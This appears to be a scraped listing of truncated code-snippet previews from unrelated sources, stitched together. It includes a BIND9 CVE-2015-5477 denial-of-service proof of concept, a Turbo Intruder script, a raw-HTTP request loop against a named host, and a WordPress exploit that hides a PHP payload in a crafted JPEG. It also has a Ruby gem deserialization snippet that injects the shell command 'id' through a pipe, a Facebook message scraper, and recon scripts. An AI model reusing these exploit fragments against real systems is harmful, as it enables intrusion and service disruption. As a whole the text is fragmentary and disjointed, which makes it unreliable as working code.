#!/usr/bin/env python | |
import socket | |
import sys | |
print('CVE-2015-5477 BIND9 TKEY PoC') | |
if len(sys.argv) < 2: | |
print('Usage: ' + sys.argv[0] + ' [target]') | |
sys.exit(1) |
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time | |
import re | |
def queueRequests(target, wordlists): | |
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP | |
engine = RequestEngine(endpoint=target.endpoint, | |
concurrentConnections=5, | |
requestsPerConnection=1, | |
resumeSSL=False, |
#!/bin/bash | |
while true | |
do | |
printf 'GET /?cb=xxx HTTP/1.1\r\n'\ | |
'Host: blanco-dev.eu2.frbit.net\r\n'\ | |
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n'\ | |
'Accept: */*\r\n'\ | |
'Accept-Language: en-US,en;q=0.5\r\n'\ | |
'Accept-Encoding: gzip, deflate\r\n'\ |
#!/bin/bash | |
# | |
# script for subdomain enumeration using 4 of the best tools with some APIs: | |
# * findomain: https://github.com/Edu4rdSHL/findomain | |
# * SubFinder: https://github.com/projectdiscovery/subfinder | |
# * Amass: https://github.com/OWASP/Amass | |
# * AssetFinder: https://github.com/tomnomnom/assetfinder | |
# | |
bold="\e[1m" |
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script> | |
<script type="text/javascript"> | |
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9 | |
$(function(){ | |
parse_messages = function() | |
{ | |
$('.twoLines.preview>.snippet').each(function(index,value) | |
{ | |
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,''); |
#!/usr/bin/env ruby | |
class Gem::StubSpecification | |
def initialize; end | |
end | |
stub_specification = Gem::StubSpecification.new | |
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2") |
import argparse | |
import requests | |
import logging | |
import pandas as pd | |
import time | |
logging.basicConfig() | |
logger = logging.getLogger('tesla-crawler') | |
logger.setLevel(logging.INFO) |
from __future__ import print_function | |
import requests | |
import logging | |
import json | |
import urllib.parse | |
# NOTE | |
# Enable Remote API with the following command | |
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock | |
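# Exposing the Remote API is an intended Docker feature, but a plain tcp://0.0.0.0:2375 listener is unauthenticated and unencrypted, so anyone who can reach it controls the daemon: remember to filter port 2375.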
#!/bin/bash | |
# colors | |
RED='\033[0;31m' | |
GREEN='\033[0;32m' | |
YELLOW='\033[0;33m' | |
RESET='\033[0m' | |
# install homebrew | |
echo -e "[-] ${GREEN}install homebrew...${RESET}" |